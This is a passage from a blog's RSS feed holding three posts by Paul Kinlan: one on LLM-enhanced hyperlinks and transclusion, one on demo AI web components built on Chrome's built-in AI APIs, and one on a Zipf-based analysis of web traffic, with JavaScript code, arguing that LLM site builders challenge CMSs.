<p>So far, this discussion hasn&rsquo;t focused much on AI&rsquo;s impact on the web&hellip; Large Language Models offers two distinct ways to think about the future of hypermedia: one as a philosophical successor to the original vision (which is a much longer discussion), and the other as the practical toolkit to upgrade the web we already have (which is quite fun).</p>
<p>As I was thinking about the Memex, I kept circling back to the idea that LLMs, not the web, are its modern embodiment. My usage of Large Language Models doesn&rsquo;t feel a million miles away from what Bush described. His vision was deeply personal: you build and navigate your own web of knowledge. While LLMs are grounded in their training data, your previous conversations and connections to personal data make the experience something more than what we get on the web. I tried to summarize the analogy as follows:</p>
<ul>
<li>The LLM is the information retrieval system.</li>
<li>ChatGPT/Gemini are the personal machines, with context and memory tailored to you.</li>
<li>The web is the unstructured, non-hierarchical file system.</li>
<li>Wikipedia is the encyclopedia (obviously).</li>
<li>Memory in LLM apps represents the trails that don&rsquo;t fade.</li>
<li>Multimodality corresponds to the photocells, microfiche, and tape.</li>
<li>Reasoning is analogous to the identification of compounds and their reactions.</li>
</ul>
<p>In this view, the concept of &ldquo;trails&rdquo; is deeply interesting. LLM tools don&rsquo;t create hard, permanent links between two distinct pieces of information. Instead, they build on previous interactions as a conversation progresses. If you observe their &ldquo;thinking traces,&rdquo; you can see the link being <em>inferred</em> rather than explicitly created.</p>
<p>Beyond this philosophical parallel, LLMs also offer the practical <em>tools</em> to finally realize the promise of hypertext <em>on the web itself</em>. They are the enabling technology that can upgrade the humble <code>&lt;a&gt;</code> tag and make it truly &ldquo;hyper.&rdquo;</p>
<p>For decades, ideas like summarizing a link&rsquo;s destination or merging content from another page were technically possible but practically impossible to implement at scale. With LLMs, these complex natural language tasks become trivial. This opens the door to evolving the web and differentiating it from both applications and the closed conversational interfaces of LLMs. And it all comes down to enhancing the link.</p>
<p>While the humble <code>&lt;a&gt;</code> tag is part of the concept of hypertext, I don&rsquo;t think the <code>&lt;a&gt;</code> is actually &ldquo;hyper.&rdquo; It&rsquo;s just a pointer. It points from Site A to Site B. It might have some <code>rel</code> properties to define the nature of the link, but fundamentally, it&rsquo;s just a pointer.</p>
<p>Now, I&rsquo;m being a bit harsh on the <code>&lt;a&gt;</code> tag. It&rsquo;s actually pretty incredible. Links are very simple to create. You write a small bit of text and can point to a page, a named element within a page, and in probably the biggest change to anchoring—you can now link to arbitrary text with Text Fragments. For a brief while, <a href="https://paul.kinlan.me/what-happened-to-web-intents/">you could also link into functionality</a> (actually if websites could be MCP servers, we might actually solve this).</p>
<p>The way we experience a link is typically one-way: <code>A-&gt;B</code>. Yes, many platforms like <a href="https://www.wikimedia.org/">Wikipedia</a> or <a href="https://tiddlywiki.com/">TiddlyWiki</a> allow for bi-directional linking. And yes, there are protocols like WebMention that enable ping-backs so that a site owner can present all the sites that link to them. But site-level features like these require the site to support them, and infrastructure protocols require you to set up some very complex infrastructure.</p>
<p>This got me thinking: how might links on the web become two-way? Actually, how many &ldquo;ways&rdquo; could a link be?</p>
<p>Let&rsquo;s assume we have a simple link <code>&lt;a href=&quot;https://paul.kinlan.me/slice-the-web/&quot;&gt;Slice the web&lt;/a&gt;</code> and ignore how links work today in HTML and JavaScript (i.e., referrer).</p>
<ol>
<li><strong>Site A points to Site B (<code>A -&gt; B</code>).</strong> This is the traditional link we know today.</li>
<li><strong>Site A pulls from Site B (<code>A &lt;- B</code>).</strong> What if we could pull information from the link&rsquo;s target into the current page&rsquo;s context? Could we summarize the information to give you an idea of the content before navigating? Could we merge the target page and the current page?</li>
<li><strong>Site B understands what points to it (<code>B -&gt; A</code>).</strong> As a user, I might want to know where I came from more clearly (yes, we have a back button), or I might want to know which other sites link to this page. WebMention solves some of this, but could this functionality be part of the browser itself, even with complex infrastructure?</li>
<li><strong>Site B pulls from Site A (<code>B &lt;- A</code>).</strong> This is more complex, but as with <code>A &lt;- B</code>, being able to merge content from the referring site directly into the current page offers interesting possibilities.</li>
</ol>
<p>I&rsquo;m particularly enamored by the &ldquo;A pulls from B&rdquo; (<code>A &lt;- B</code>) concept, frequently known as &ldquo;<a href="https://en.wikipedia.org/wiki/Transclusion">transclusion</a>&rdquo;, and I can understand why it wasn&rsquo;t built in the past. How could you do anything useful with the content on the target page? Until recently, NLP techniques were incredibly difficult to perform, but with the introduction of LLMs, summarizing and other manipulation of content has become surprisingly easy.</p>
<p>I wrote an extension that can help you to summarize a link&rsquo;s destination before you navigate to it.</p>
<div class="youtube">
      <iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen" loading="eager" referrerpolicy="strict-origin-when-cross-origin" src="https://www.youtube.com/embed/p0za2eedC9M?autoplay=0&amp;controls=1&amp;end=0&amp;loop=0&amp;mute=0&amp;start=0" title="YouTube video"></iframe>
    </div>

<p>I&rsquo;ll quickly digress to another hypermedia concept introduced by Ted Nelson: <a href="https://archive.org/details/STRETCHTEXT">StretchText</a>. I think the concept is brilliant. You have a piece of text that can be expanded to provide significantly more information, and then expanded again. It&rsquo;s incredibly difficult to manage from an author&rsquo;s perspective because you have to create all this layered information. How much time would you spend doing this? Probably zero.</p>
<p>With today&rsquo;s LLM technologies, we can reason more about the content of pages giving us the ability to take the text of a page or a selection and expand it with additional context from what the models know.</p>
<p>You can then take this concept and change the way linking works. By parsing both the linked page and the current page, it&rsquo;s possible to merge the linked content into the current context where the link exists. Perhaps we could remove the scourge of &ldquo;Click here&rdquo; links and provide more context to the user for any link on the page.</p>
<div class="youtube">
      <iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen" loading="eager" referrerpolicy="strict-origin-when-cross-origin" src="https://www.youtube.com/embed/M0o4MNmWIDo?autoplay=0&amp;controls=1&amp;end=0&amp;loop=0&amp;mute=0&amp;start=0" title="YouTube video"></iframe>
    </div>

<p>In <a href="/super-apps/">super-apps</a> and <a href="/embedding/">embedding</a> I touched on the idea that increasing amounts of people&rsquo;s time might be spent in LLM based chat experiences and not in the browser. If this happens, there is a world where the way people interact with services and tools is managed entirely by the LLM and that is a risk for the web.</p>
<p>Imagine you are a store and you provide a service that helps a use find flights, one of the ways that you make money for your service is by up-selling services on top of the booking (e.g, gate change information). In a world where the LLM is the primary way that people interact with content, you will want to ensure that your brand and service are still visible to the user. LLMs will either generate their own the entire UI to integrate with services and existing sites, or they will ask site authors to customize their site (including bespoke API integrations). If it&rsquo;s the latter path, LLM providers will want to use what already exists (i.e, hundreds of millions of existing pages of content), which leads me to believe that there will be a need for sites to easily control the presentation of their brand and service inside the &ldquo;super-app&rdquo;.</p>
<p>&ldquo;Transclusions&rdquo; is the technical term. Today, <code>&lt;iframe&gt;</code> is the transclusion that enables you to have an entire page run inside another page, but that feels to coarse. We need to explore the idea of securely running islands of functionality from the target page directly in the host.</p>
<p>I mocked this up in the following video. This demo is a Chrome Extension that opens the target page, finds the element that is specified on the link and clones the DOM into a <code>&lt;foreignObject&gt;</code> in SVG which is then bundled up and rendered in the host page (/me handwaves security issues).</p>
<div class="youtube">
      <iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen" loading="eager" referrerpolicy="strict-origin-when-cross-origin" src="https://www.youtube.com/embed/WU-VVTkwDoU?autoplay=0&amp;controls=1&amp;end=0&amp;loop=0&amp;mute=0&amp;start=0" title="YouTube video"></iframe>
    </div>

<p>Make no mistake that this particular demo is a parlour trick, but I think there might be a useful primitive here not just for Web content being integrated more seamlessly into an LLM, but this could also be something that native-app platforms could also offer and enable a more seamless integration between web and app content. The solution might be a new element, adding something on top of an iframe, or maybe even a media-query to enable the site to hide certain UI when it knows it&rsquo;s embedded.</p>
<p>It&rsquo;s fun to think about how links might evolve as our technology evolves. Here are some more ideas:</p>
<ul>
<li>Image maps have largely died out, but now that we can identify objects in an image, could we make it easier to author an image map with language annotations instead of bounding boxes (e.g., &ldquo;red car&rdquo; -&gt; ford.com)?</li>
<li>We can link to a time-code in an audio file. With audio-to-text models, could we do something similar to text fragments for audio?</li>
<li>Could we make it easier to extract useful content from an <code>&lt;audio&gt;</code> such as links that were &lsquo;heard&rsquo; in the discussion.</li>
<li>If a site could expose their embeddings, could we cross-link across the origin automatically?</li>
<li>During my research on hyperlinking, much of the content I accessed was in PDFs on the Internet Archive. These PDFs are hosted in an application that requires many clicks to get to the important page. Could links be augmented with simple actions? Of course, we would have to think carefully about safety to mitigate &ldquo;Buy these nappies&rdquo; attacks and a host of others.</li>
</ul>
<p>For 30-40 years the original discussions around hypermedia and hypertext had almost no practical applications. It appears to have been all academic and centered around egos. While technologies like HyperCard existed and were well-liked, it wasn&rsquo;t until the web arrived that humanity really progressed in this area. In the following 30 years, there again wasn&rsquo;t much development in linking on the web.</p>
<p>We are at a moment where new technologies like LLMs and Vision models can enable us to expand and improve the very definition of a hyperlink while also maintaining the reason why I think the web&rsquo;s linking mechanism enabled the web to succeed where other hypermedia platforms failed: That authoring a <code>&lt;a&gt;</code> is the easiest way of linking that we&rsquo;ve known.</p>
<p>Maybe the fact that we have extensions that can augment and personalize every part of a page means we are already there. Maybe this post is also academic and ego-driven, and hypermedia has already found its perfect fit for authors and users. I hope not. The link is what makes the web, and the link is what will keep the web strong and differentiated from all other platforms. I really want to see more experimentation in hyperlinking.</p>
]]></content:encoded></item><item><title>elements</title><link>https://aifoc.us/elements/</link><pubDate>Wed, 16 Jul 2025 17:00:00 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/elements/</guid><description>&lt;p>As much as struggle with &lt;a href="https://aifoc.us/on-device/">on-device processing&lt;/a> and the quality of its output compared to server models, I am excited by some of the APIs that are being built into browsers that are backed by LLMs and other AI inference models.&lt;/p>
&lt;p>For example, the prompt API, along with a multi-modal version that can take any arbitrary combination of text, image, and audio and run prompts against them. These APIs are neat but not yet web-exposed and many developers struggle to know what to do with a generic prompt. It&amp;rsquo;s not a solution that is natural to many people yet.&lt;/p></description><content:encoded><![CDATA[<p>As much as struggle with <a href="/on-device/">on-device processing</a> and the quality of its output compared to server models, I am excited by some of the APIs that are being built into browsers that are backed by LLMs and other AI inference models.</p>
<p>For example, the prompt API, along with a multi-modal version that can take any arbitrary combination of text, image, and audio and run prompts against them. These APIs are neat but not yet web-exposed and many developers struggle to know what to do with a generic prompt. It&rsquo;s not a solution that is natural to many people yet.</p>
<p>To solve this, Chrome introduced a host of use-case-based APIs into the browser. These APIs, such as <a href="https://developer.chrome.com/docs/ai/summarizer-api">Summarizer</a>, <a href="https://developer.chrome.com/docs/ai/writer-api">Writer</a> and <a href="https://developer.chrome.com/docs/ai/rewriter-api">Rewriter</a>, <a href="https://developer.chrome.com/docs/ai/translator-api">Translate</a> and <a href="https://developer.chrome.com/docs/ai/language-detection">Language Detection</a> are designed to run within web content. An API designed to solve a particular problem is easier to standardize and build consensus around. It also makes it clearer for web developers and business owners to see how they might integrate it into their businesses.</p>
<p>For example, while building this blog (it&rsquo;s Hugo-based), I would checkpoint my work by committing it to my Git repo. I realized that many products are subtly integrating AI into their experiences. For example, when you check something into your repo, a small star icon generates a commit message based on the changes. I use this all the time now because it beats my &ldquo;asdf&rdquo; messages hands-down.</p>
<figure><img src="/images/github-summarize.gif"
    alt="AI Summarize a set of github commits"><figcaption>
      <p>AI Summarize a set of github commits</p>
    </figcaption>
</figure>

<p>This is a use-case that I think is easy for people to understand.</p>
<p>While sharing a recent post, I saw a Tweet from my friend Eiji that was in Japanese, but I could still read it because a &ldquo;Translate&rdquo; link appeared within the text.</p>
<figure><img src="/images/translate-tweet.gif"
    alt="Translate Tweet"><figcaption>
      <p>Translate Tweet</p>
    </figcaption>
</figure>

<p>Again, another use-case that is easy to understand.</p>
<p>This got me thinking. It&rsquo;s great that you can use JavaScript to wrangle these high-level APIs, but it also made me consider if there are even higher-level abstractions that we should be thinking about, like HTML.</p>
<p>It feels like there is a massive opportunity to either imbue existing elements and components with these capabilities or even to conceive of new elements altogether, and it&rsquo;s something that I think we should talk about more.</p>
<p>With this in mind, I&rsquo;ve <a href="https://github.com/PaulKinlan/ai-wc">created three simple examples</a>: Summarize and Translate and Image picking.</p>
<p>The summarize element&rsquo;s goal is to act like the commit message generator in VS Code. You provide the ID of an element to watch for changes, and it will summarize the content. The best part is that it uses <a href="https://developer.mozilla.org/en-US/docs/Web/API/ElementInternals">InternalElements</a> to enable the element to participate in <code>&lt;form&gt;</code> submissions.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span>&lt;<span style="color:#f92672">ai-summarize-component</span> <span style="color:#a6e22e">watch</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;longTextElement&#34;</span>&gt;&lt;/<span style="color:#f92672">ai-summarize-component</span>&gt;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">textarea</span> <span style="color:#a6e22e">id</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;longTextElement&#34;</span> <span style="color:#a6e22e">name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text&#34;</span> <span style="color:#a6e22e">rows</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;4&#34;</span> <span style="color:#a6e22e">cols</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;50&#34;</span>&gt;&lt;/<span style="color:#f92672">textarea</span>&gt;
</span></span></code></pre></div><figure><img src="/images/ai-summarize.gif"
    alt="AI Summarize a textarea"><figcaption>
      <p>AI Summarize a textarea</p>
    </figcaption>
</figure>

<p>The translate element is a <code>HTMLParagraphElement</code> that detects the language of its content and then offers to translate it into the user&rsquo;s preferred language. It uses both the <a href="https://developer.chrome.com/docs/ai/translator-api">Translate API</a> and <a href="https://developer.chrome.com/docs/ai/language-detection">LanguageDetection API</a> to do this.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span>&lt;<span style="color:#f92672">ai-translate-component</span>&gt;
</span></span><span style="display:flex;"><span>  私はティーポットです と とても幸せです
</span></span><span style="display:flex;"><span>&lt;/<span style="color:#f92672">ai-translate-component</span>&gt;
</span></span></code></pre></div><figure><img src="/images/ai-translate-demo.gif"
    alt="AI Translate a paragraph Element"><figcaption>
      <p>AI Translate a paragraph Element</p>
    </figcaption>
</figure>

<p>Maybe we will finally get an answer to the bug I filed years <a href="https://bugs.chromium.org/p/chromium/issues/detail?id=872770">ago about Google Translate breaking React</a> as developers will have a way to integrate translation into their apps exactly as they need it, versus the shotgun approach of the current Google Translate in Google Chrome.</p>
<p>I also like to think about how form elements might integrate with technologies like generative LLMs. For example, consider the humble <code>&lt;input type=&quot;file&quot; accept=&quot;image/png&quot; /&gt;</code>. If we assume image generation is here to stay, should we consider enabling deeper integration into the file and content pickers? If so, this would mean you no longer have to generate an image in one app, download it, find it, and then upload it.</p>
<p>Well, <code>&lt;ai-image-input&gt;</code> is a demo of an optimization for that.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span>&lt;<span style="color:#f92672">form</span> <span style="color:#a6e22e">id</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;imageInputForm&#34;</span>&gt;
</span></span><span style="display:flex;"><span>  &lt;<span style="color:#f92672">ai-image-input</span> <span style="color:#a6e22e">name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;image&#34;</span>&gt;&lt;/<span style="color:#f92672">ai-image-input</span>&gt;
</span></span><span style="display:flex;"><span>  &lt;<span style="color:#f92672">input</span> <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;submit&#34;</span> /&gt;
</span></span><span style="display:flex;"><span>&lt;/<span style="color:#f92672">form</span>&gt;
</span></span></code></pre></div><p>It acts like a normal form element, but when you press Option (on a Mac), a new set of features is enabled, allowing you to attach an image generated from a prompt. Note that there is no on-device generation in this demo; it&rsquo;s handled by a server.</p>
<figure><img src="/images/ai-image-upload.gif"
    alt="AI Image Input Element"><figcaption>
      <p>AI Image Input Element Demo</p>
    </figcaption>
</figure>

<p>I think the file input is a very neat use case that could be extended to video. It also reminds me of one of the goals of Web Intents: allowing deeper integration of the browser with system services and user-preferred applications, eliminating the need to leave the browser, download a file, and then re-upload it.</p>
<p>There&rsquo;s a lot of other user interface features that I could imagine that would be useful to have as a built-in part of the platform. For example:</p>
<ul>
<li><code>&lt;a href=&quot;https://paul.kinlan.me&quot; summarize&gt;</code> could enable the user agent to fetch the URL and summarize it for the user. Given CSP and other security concerns, this would be something only a user agent provided element could manage today.</li>
<li><code>&lt;a href=&quot;...&quot; extract-info=&quot;recipe-time&quot;&gt;</code> could display &ldquo;Cook time: 45 mins&rdquo; on hover or inside the element if the link points to a recipe, or <code>&lt;a href=&quot;...&quot; extract-info=&quot;product-price&quot;&gt;</code> could show the price and rating for a product link.</li>
<li><code>&lt;a href=&quot;asdf.com&quot; clarify-purpose&gt;Click here&lt;/a&gt;</code> might be an interesting way to turn a vague link text like &ldquo;Click here&rdquo; or &ldquo;Read more,&rdquo; because the browser could fetch the destination&rsquo;s content to generate a more descriptive label for screen readers (this might just be a good thing for an extension to do instead)</li>
<li><code>&lt;a href=&quot;asdf.com&quot; add-to-calendar&gt;Event page&lt;/a&gt;</code> would be fun if you know if the link points to an event page, the browser could parse it for a date, time, and location and present a native UI to add the event to the user&rsquo;s default calendar streamlining a common, multi-step process.</li>
<li><code>&lt;input type=&quot;file&quot; extract=&quot;invoice-details&quot;&gt;</code> could allow a user to upload a PDF of an invoice, and the browser could use an LLM to automatically parse and populate fields for the date, amount, and vendor, simplifying expense reporting or data entry tasks.</li>
<li><code>&lt;input type=&quot;text&quot; transcribe&gt;</code> could enable the user agent to transcribe audio into text by offering a microphone button that would record audio.</li>
<li>Should we have a dedicated <code>&lt;input type=&quot;prompt&quot;&gt;</code> or <code>&lt;input type=&quot;chat&quot;&gt;</code> that might offer a user affordance like <code>&lt;input type=&quot;search&quot;&gt;</code> offers, could it hook into a user-configured default chat provider?</li>
<li>An attribute like <code>&lt;img identify-objects&gt;</code> could allow the browser to recognize objects within an image and then expose them as to the user as a list of tags or descriptions, enhancing accessibility and searchability.</li>
<li>A <code>&lt;video describe&gt;</code> attribute could automatically generate and voice an audio description of the visual events happening on screen, not just closed captions as a transcription.</li>
<li>A textarea could be enhanced with an attribute that hints at the type of content expected, like <code>&lt;textarea suggestions=&quot;creative-writing&quot;&gt;</code> or <code>&lt;textarea suggestions=&quot;code-completion&quot;&gt;</code>. Much like how you can tell the browser the type of <a href="https://developer.mozilla.org/en-US/docs/Web/HTML/Reference/Global_attributes/inputmode">input mode</a>, the browser could then offer context-aware autocompletion or creative prompts to help the user.</li>
</ul>
<p><strong>Update</strong> After posting this, I also experimented with an <code>&lt;ai-date-component&gt;</code> that let&rsquo;s you write a date in natural language and it will parse it into a date object.</p>
<figure><img src="/images/ai-date.gif"
    alt="AI Date Component Demo"><figcaption>
      <p>AI Date Component Demo</p>
    </figcaption>
</figure>

<p><strong>End Update</strong></p>
<p>Should the default elements be imbued with AI capabilities? Or should these all just live in user-land as custom-elements or Components in the framework of your choice? We certainly are starting to get more of the technology to do this all in the browser, whether it&rsquo;s the improvements to Web Components or the new AI-based APIs, but I don&rsquo;t actually know the answer.</p>
<p>I do believe that this is an that we need a lot more discussion around and is something browser vendors and spec authors should really starting to think about it too.</p>
<hr>
<p>The source to the demo web components is available on my github: <a href="https://github.com/PaulKinlan/ai-wc">https://github.com/PaulKinlan/ai-wc</a></p>
]]></content:encoded></item><item><title>Whither CMS?</title><link>https://aifoc.us/whither-cms/</link><pubDate>Sat, 05 Jul 2025 21:47:22 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/whither-cms/</guid><description>&lt;p>When I moved to North Wales I noticed how many of the local businesses were solely on Facebook and Instagram. I spoke to some of them to ask why they don&amp;rsquo;t have a site and it came down to four common issues 1) cost, 2) built in network, 3) skill, and 4) time. It&amp;rsquo;s hard to beat free, good enough, and access to a network of potential customers. At the same time nearly everyone that I spoke to knew it wasn&amp;rsquo;t a perfect situation and they wouldn&amp;rsquo;t say &amp;rsquo;no&amp;rsquo; to their own independent presence.&lt;/p></description><content:encoded><![CDATA[<p>When I moved to North Wales I noticed how many of the local businesses were solely on Facebook and Instagram. I spoke to some of them to ask why they don&rsquo;t have a site and it came down to four common issues 1) cost, 2) built in network, 3) skill, and 4) time. It&rsquo;s hard to beat free, good enough, and access to a network of potential customers. At the same time nearly everyone that I spoke to knew it wasn&rsquo;t a perfect situation and they wouldn&rsquo;t say &rsquo;no&rsquo; to their own independent presence.</p>
<p>CMSs offer a path for people without the skill or the time to get their own place on the web, and this is amazing. Yet for many people I spoke to it&rsquo;s still a hurdle to think about what a domain name is (let alone paying for it), how sites should work, and the designs etc. They did know what they wanted their sites to say though (name, address, pictures, booking forms, contact details).</p>
<p>I&rsquo;m interested in the health of the web and I think that LLMs will help make it significantly easier to create and produce content on the web (and the web is a perfect medium for people to be able to create and share ideas), but what does that mean for CMSs?</p>
<p>I decided to try and do some analysis on the usage of certain tools across the ecosystem and I wanted to see what the adoption is of certain technology stacks such as CMSes and framework mapped against how people use on the web.</p>
<p>It&rsquo;s incredibly hard to get this data publicly so what I am about to show you has a number number of leaps to try and interpret the data. So, without further ado, let&rsquo;s go a leapin'</p>
<p>First up is time spent on the web. <a href="https://pro.similarweb.com/#/digitalsuite/markets/webmarketanalysis/mapping/All/999/3m?webSource=Total">SimilarWeb&rsquo;s ranking of the top 100 sites,</a> includes both the average time spent and number of navigations per month to each of the top 100 sites. It is the most useful data that I&rsquo;ve found and <a href="https://docs.google.com/spreadsheets/d/18cEessx2d291daGwFBQTIY_MqemTp6dWWQYXf8OSutI/edit?gid=0#gid=0">you can see the number of navigations follows a trend that looks like zipf&rsquo;s-law</a> (<a href="https://www.parse.ly/zipfs-law-of-the-internet-explaining-online-behavior/">Parse.ly</a> also had a good article from a couple of years ago). SimilarWeb only accounts for the top 100 sites and the web extends out to roughly <a href="https://www.wix.com/blog/how-many-domains-are-there#:~:text=According%20to%20Domain%20Name%20Stat,increase%20from%20Q4%20of%202021.">350 million origins</a> (as of 2023) so we will have to do some extra work. It won&rsquo;t change the shape of the graph but it will change where we look at where the percentile of navigations happens.</p>
<figure><img src="/images/zipf.png"
    alt="Navigations predicted using zipf vs SimilarWeb"><figcaption>
      <p>Navigations predicted using zipf vs SimilarWeb</p>
    </figcaption>
</figure>

<aside>Navigations are an imperfect measure of internet usage because time is not spent equally on a site especially if you believe Google's goal to get you off the site as quickly as possible against Facebook's goal to keep you on site. It is the best absolute measurement that I can find. </aside>
<p><em>If</em> we assume that this distribution is directionally accurate and use SimilarWeb&rsquo;s prediction for the top sites monthly traffic of 83,000,000,000 navigations, then you can compute the estimated monthly traffic for the 2nd most popular site&hellip;. Doing this all the way to 360 millionth web site you can infer that roughly 50% of the web&rsquo;s traffic is sent to the top 17 sites. The 75% percentile accounts for 451 sites, 90th percentile 27,219 sites, and 95th percentile is 426,494 sites.</p>
<p>A more traditional way to look at the data is through the Top orders of magnitude. So, the Top 1000 sites accounts for 78.94% of navigations; the Top 10,000 is at 87.38%; Top 10,000 is 92.71% and the Top 1,000,000 is at 96.07%.</p>
<p>Kinda mind blowing think about where people spend their time (I should look at this data over time and see how quickly the web is centralizing).</p>
<p>For completeness, here is the <a href="https://gist.github.com/PaulKinlan/a091b7c52f3a7cc43d081cc79f945c63">code</a> I used to do the calculation (please feel free to critique the methodology).</p>
<pre tabindex="0"><code>const alpha = 1.2; // 1.2 seems to map well to top 100 sites... Maybe it works for rest of web?
const size = 360_000_000; // 360 million is the number of sites in the web as of 2023
/*
83 billion is the number of navigations for rank 0 (the most popular site)
for one month in 2025 (yes, I know I don&#39;t have the size of the web
for 2025, but this is a good estimate based on current trends).
*/

const max = 83_000_000_000;

// Zipfian based on a known rank and alpha.
const valueAtRank = (valueAt0, rank, alpha) =&gt; {
  return valueAt0 / Math.pow(rank, alpha);
};

/*
 Calculate the total number of navigations following a Zipfian distribution.
*/
let sum = 0;

for (let i = 0; i &lt; size; i++) {
  // Value at rank 0 is the max value.
  // Alpha is the Zipfian constant, 1.2 is a good value looking at SimilarWeb
  const value = Math.floor(valueAtRank(max, i + 1, alpha));
  sum += value;

  if (sum &gt; Number.MAX_SAFE_INTEGER) {
    console.warn(&#34;Sum exceeded MAX_SAFE_INTEGER, resetting to 0&#34;);
    throw new Error(&#34;Sum exceeded MAX_SAFE_INTEGER&#34;);
  }
}

console.log(`Sum of generated values: ${sum}`);

/*
Calculate the rank at a given percentile.
This function finds the rank that corresponds to a given percentile
based on the cumulative sum of values generated by the Zipfian distribution.
It iterates through ranks, accumulating their values until it reaches the
target value for the specified percentile.
*/
const rankAtPercentile = (percentile, size, sum) =&gt; {
  const target = sum * (percentile / 100);
  let cumulativeSum = 0;
  for (let i = 1; i &lt; size; i++) {
    cumulativeSum += valueAtRank(max, i, alpha);
    if (cumulativeSum &gt;= target) {
      return i;
    }
  }
  return size; // If no rank found, return the size as the last rank
};

const percentageAtRank = (rank, sum) =&gt; {
  let cumulativeSum = 0;
  for (let i = 1; i &lt; rank; i++) {
    cumulativeSum += valueAtRank(max, i, alpha);
  }
  return (cumulativeSum / sum) * 100;
};

console.log(rankAtPercentile(50, size, sum));
console.log(rankAtPercentile(75, size, sum));
console.log(rankAtPercentile(90, size, sum));
console.log(rankAtPercentile(95, size, sum));

console.log(`Rank 1000 is at ${percentageAtRank(1000, sum)}%`);
console.log(`Rank 10000 is at ${percentageAtRank(10000, sum)}%`);
console.log(`Rank 100000 is at ${percentageAtRank(100000, sum)}%`);
console.log(`Rank 1000000 is at ${percentageAtRank(1000000, sum)}%`);
</code></pre><p>Now that we have some interesting data about how traffic flows around the web, let&rsquo;s see how the sites in the Top <em>[insert your order of magnitude here]</em> are built (<a href="https://builtwith.com/">Builtwith.com</a> and <a href="https://httparchive.org/reports/techreport/tech?tech=WordPress,Shopify,Wix,Joomla,Drupal,Squarespace,PrestaShop,Webflow,1C-Bitrix,Tilda&amp;geo=ALL&amp;rank=Top+1k">The Chrome UX technology dashboard</a> are an absolute goldmine of useful information.) You can see that <a href="https://httparchive.org/reports/techreport/tech?tech=WordPress,Shopify,Wix,Joomla,Drupal,Squarespace,PrestaShop,Webflow,1C-Bitrix,Tilda&amp;geo=ALL&amp;rank=Top+1k">the popular CMSs just aren&rsquo;t used across the top 1000 sites</a>, and this is confirmed when you dive into builtWith&rsquo;s reports (<a href="https://trends.builtwith.com/cms/">Top 1m</a>, <a href="https://trends.builtwith.com/cms/WordPress">Wordpress</a>, <a href="https://trends.builtwith.com/cms/Drupal">Drupal,</a> <a href="https://trends.builtwith.com/cms/Joomla!">Joomla</a>, <a href="https://trends.builtwith.com/cms/Squarespace">SquareSpace</a>, <a href="https://trends.builtwith.com/cms/Wix">Wix</a>). It&rsquo;s often not until you get to the top 1 million sites that you start to see a significant amount of usage in the ecosystem, but the top 1 million sites, is not where the majority of the navigations are.</p>
<aside>Interestingly, according to builtWith all CMSs have seen a decline in usage across the Top 1m sites since about 2021. Odd.</aside>
<p>Looking at Wordpress, the most popular site building tool, you do see usage increase in the top 10,000 sites and it clearly grows in popularity through the top 1,000,000, but at some point you have to question stats like &ldquo;40% of all sites&rdquo; and realise that it&rsquo;s certainly not 40% of traffic and time spent by people using the web.</p>
<p>It&rsquo;s not until after the top 1,000,000 that you really start to see it&rsquo;s growth in the CMSs. My hunch broadly is that while many of the companies who build CMSes (I struggle with the plural here&hellip; CMSi?) will have a few very large sites as customers, the vast majority of customers are the tiny sites that get small amounts of traffic.</p>
<aside>I need to recognise a potential confirmation bias that I might have here. When I ran a small shared-hosting company we threw more sites on a single server than it could handle if they all got popular, that was because we knew that the vast majority of the customers would get almost 0 traffic. I see the same thinking in the industry today.</aside>
<p>This is one of the things I love about the web, you can still get found and share you knowledge and build a community even if you are outside of the Top 100,000,000.</p>
<p>Ok &hellip; we are this far in and I&rsquo;ve not made my point. Here goes&hellip; If you believe that LLMs are going to make it easier for people to build sites, then I think CMSs of today might be in real trouble and will need to adapt.</p>
<p>We&rsquo;re seeing lots of new tools coming up where the idea is that you can build a site just by describing what you want to do, whether that&rsquo;s <a href="https://lovable.dev/">loveable</a>, <a href="https://stitch.withgoogle.com/">Stitch</a> or any of the other hundreds of tools that are coming out. Heck, even I built a tool as an experiment with generative site building: <a href="http://makemy.blog">makemy.blog</a>. There are also tools or Canvas&rsquo; being built into the Chat clients that enable you to experiment with a site design and share it with friends, and then there are tools like <a href="https://youtu.be/GjvgtwSOCao">AI Studio</a> or <a href="https://www.anthropic.com/news/claude-powered-artifacts">Claude Artifacts</a> that will build simple sites and let put them on the public web instantly.</p>
<p>The great thing about these types of tools is that you can just try it, iterate on it and get a design or layout or style that is unique to you and you don&rsquo;t feel stupid for just trying things and you don&rsquo;t have to spend any money. Many of the people that I spoke to about their Facebook presence know what they want on a site, it&rsquo;s just that it&rsquo;s instant and simple on Facebook (and you get instant reach and distribution) where as on the web, you would frequently have to sign up for a service, pick one of the generic stock-templates, enter your credit card&hellip; urgh.</p>
<p>The sheer fact that as a regular person you can describe the type of site you want to get on the web and what data it will show, is incredible, so much so that I think we are going to see an explosion in tools that can create compelling looking sites and experiences and just let normal web users design and iterate.</p>
